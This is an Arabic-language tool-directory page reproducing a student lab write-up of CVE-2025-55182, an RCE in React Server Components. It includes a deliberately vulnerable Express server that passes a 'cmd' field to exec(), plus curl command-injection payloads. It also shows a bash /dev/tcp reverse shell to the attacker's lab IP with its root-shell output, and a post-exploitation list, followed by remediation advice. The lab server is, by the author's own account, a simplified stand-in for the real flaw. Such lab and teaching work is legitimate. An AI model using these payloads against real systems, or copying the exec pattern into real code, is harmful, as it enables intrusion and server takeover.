Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182-analysis — بحث أمني وتحليل استغلال لثغرة CVE-2025-55182 (React) — ربط CVSS مع OWASP Top 10 | Kitploit
أدوات/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

بحث أمني وتحليل استغلال لثغرة CVE-2025-55182 (React) — ربط CVSS مع OWASP Top 10

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 — تحليل تنفيذ التعليمات البرمجية عن بُعد في React Server Components

تحليل ثغرة أمنية في تطبيق ويب · M2 Cybersecurity · 2025 المؤلف: نيان محمد · LinkedIn

سلسلة استغلال متكاملة لثغرة إلغاء تسلسل غير آمنة خطيرة (CVSS 10.0) في React Server Components، بدءًا من الاستطلاع وصولًا إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة، مع خارطة طريق كاملة للمعالجة.


⚠️ إخلاء مسؤولية أخلاقي

يستهدف هذا البحث تطبيقًا مخبريًا ضعيفًا عمدًا صُمم لتوضيح الثغرة CVE. تمت جميع الاختبارات في شبكة افتراضية معزولة دون أي اتصال بأنظمة الإنتاج أو بيانات مستخدمين حقيقية أو خدمات طرف ثالث.

  • لا تقم بتشغيل هذه التقنيات ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا صريحًا لاختبارها.
  • لا تنشر التطبيق الضعيف إلى أي شبكة متصلة بالإنترنت.
  • تنطبق مبادئ الإفصاح المسؤول — أبلغ دائمًا عن النتائج عبر قنوات منسقة.

جدول المحتويات

  1. ملخص الثغرة
  2. الإصدارات المتأثرة
  3. بيئة المختبر
  4. شرح الاستغلال
  5. تقييم الأثر
  6. المعالجة
  7. المهارات المُثبتة

ملخص الثغرة

الحقلالقيمة
CVECVE-2025-55182
التصنيفإلغاء تسلسل غير آمن → تنفيذ تعليمات برمجية عن بُعد
CVSS v3.110.0 (حرج) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
المصادقة المطلوبةلا شيء
تفاعل المستخدم المطلوبلا شيء
متجه الهجومالشبكة (عن بُعد)
المكوّنوقت تشغيل React Server Components (RSC)

كيف تعمل الثغرة

قدّمت React Server Components تنسيق تسلسل جديدًا لبث المكوّنات المُقدَّمة من جانب الخادم إلى العميل. في الإصدارات الضعيفة، تقبل نقطة نهاية RSC حمولة JSON تحتوي على حقل cmd يُمرَّر دون تنقية إلى child_process.exec() كجزء من تقييم العرض من جانب الخادم.

يمكن للمهاجم إرسال طلب POST مُعدّ بدقة بحيث:

  1. يُقبل كحمولة RSC شرعية (بدون مصادقة، بدون CSRF)
  2. يُفعّل تنفيذ تعليمات برمجية من جانب الخادم أثناء "العرض"
  3. يعمل بصلاحيات عملية Node.js (غالبًا root في الحاويات)

الإصدارات المتأثرة

المكوّنالنطاق المتأثرتم التصحيح في
react19.0.0 → 19.2.019.3.0+
react-server-dom-webpack19.0.0 → 19.2.019.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+

بيئة المختبر

الدورنظام التشغيلالأدوات
المهاجمKali Linux (أحدث إصدار)nmap, curl, netcat, OWASP ZAP, Firefox
الهدفUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
الشبكةVMware VMnet Host-Onlyلا حركة خروج إلى الإنترنت

التطبيق الهدف

خادم Express + RSC بسيط يعرّض نقطة نهاية /rsc تنفّذ الأوامر من الحمولة الواردة بشكل غير آمن — لإعادة إنتاج نمط الثغرة في CVE الحقيقية بطريقة مُتحكم بها:

// server.js — simplified, lab-only
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // VULNERABLE: executes attacker-controlled string
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

شرح الاستغلال

المرحلة 1 — الاستطلاع

# Port discovery
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# Service verification
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

تمثل ترويسة X-Powered-By: Express والمنفذ غير المعتاد 3000 بصمة قوية على أن هذا تطبيق Node.js — بما يتوافق مع بيئات نشر RSC.

المرحلة 2 — التأكيد عبر أمر غير ضار

قبل محاولة القيام بأي إجراء تدميري، تحقق من الثغرة باستخدام أمر غير مؤذٍ:

curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# Response:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ مؤكَّد: تنفيذ تعليمات برمجية عن بُعد دون مصادقة بصلاحيات root. يعمل الخادم بصلاحيات غير مقيّدة.

المرحلة 3 — القشرة العكسية

ارتقِ من تنفيذ أمر واحد إلى قشرة تفاعلية كاملة:

# Listener on attacker machine
nc -lvnp 4444

# Payload delivery
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

يتلقى المستمع:

connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

المرحلة 4 — إمكانيات ما بعد الاستغلال (مُوضَّحة، غير منفَّذة)

بامتلاك صلاحيات root على الهدف، يستطيع المهاجم بسهولة:

  • قراءة /etc/shadow ومفاتيح SSH وأسرار التطبيق وملفات .env
  • تثبيت آليات استمرارية (مهام cron وخدمات systemd وزرع مفاتيح SSH)
  • التنقل الجانبي عبر بيانات الاعتماد المكتشفة
  • نشر برامج تعدين العملات الرقمية أو برامج الفدية
  • تعديل تطبيق Node.js لالتقاط بيانات المستخدمين بصمت

تقييم الأثر

الأثر على الأعمال (سيناريو هدف افتراضي)

المحورالأثرالشرح
السريةحرجوصول كامل للقراءة إلى جميع بيانات الخادم
السلامةحرجالقدرة على تعديل كود التطبيق وبيانات المستخدمين
التوافرمرتفعيمكن للمهاجم إيقاف الخدمة أو احتجازها مقابل فدية
التنظيميشديدخرق لـ GDPR/DSGVO مع إلزامية الإفصاح خلال 72 ساعة · غرامة محتملة تصل إلى 4% من الإيرادات العالمية
السمعةشديدخرق معلن ومرتبط برقم CVE يضر بثقة العملاء
الماليمرتفعالاستجابة للحوادث، غرامات تنظيمية، دعوى جماعية محتملة

ملف الجهات المهاجمة

انخفاض تعقيد هذا الهجوم — دون مصادقة أو تفاعل من المستخدم، وطلب HTTP واحد فقط — يجعله جذابًا لما يلي:

  • الماسحات الانتهازية (شبكات روبوتات تفحص تلقائيًا بحثًا عن هذه الثغرة)
  • وسطاء الوصول الأولي الذين يبيعون نقاط الدخول إلى جماعات برامج الفدية
  • جهات تابعة لدول تستهدف المؤسسات التي تستخدم العرض من جانب الخادم في React

المعالجة

إجراءات فورية (خلال 24 ساعة)

  1. ترقية React إلى 19.3.0+ — الإصدار المُصحَّح

    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. قاعدة WAF مؤقتة (إذا تأخرت الترقية):

    Block POST requests to /rsc with JSON body containing "cmd" field
    
  3. استجابة طارئة للحوادث:

    • مراجعة سجلات وصول الخادم لآخر 90 يومًا
    • البحث عن حركة POST غير معتادة إلى /rsc
    • تدوير جميع الأسرار التي يمكن الوصول إليها من الخادم
    • التقاط لقطة للنظام المتأثر للتحليل الجنائي قبل المعالجة

إجراءات قصيرة المدى (خلال أسبوعين)

الإجراءالغرض
تعطيل RSC إذا لم يكن مستخدمًاتقليل سطح الهجوم — العديد من التطبيقات لا تحتاج إلى مكوّنات الخادم
تحقق صارم من المدخلاترفض أي كائن مُلغى التسلسل يحتوي على مفاتيح قابلة للتنفيذ
مستخدم حاوية بصلاحيات غير rootالحد من نطاق الضرر في حال تكرار RCE
نظام ملفات جذر للقراءة فقطمنع آليات الاستمرارية وإسقاط الملفات التنفيذية
تصفية حركة المرور الصادرةحظر حركة المرور الصادرة من خوادم التطبيقات إلى عناوين IP عشوائية

إجراءات طويلة المدى (خلال ربع سنة)

الإجراءالغرض
WAF مع تحليل سلوكيكشف حمولات POST الشاذة بما يتجاوز قواعد التوقيعات
الحماية الذاتية للتطبيق وقت التشغيل (RASP)حظر استدعاءات الدوال الخطيرة مثل exec() في وقت التشغيل
تحليل تركيبة البرمجيات (SCA) في CI/CDرصد التبعيات الضعيفة قبل النشر (pip-audit, npm audit, Trivy)
إيقاع اختبار الاختراقسنويًا + بعد كل إصدار رئيسي
برنامج مكافآت اكتشاف الثغراتتحفيز الإفصاح الأخلاقي قبل أن يكتشف المهاجمون الثغرات

الربط مع OWASP Top 10

تنزيل الأداة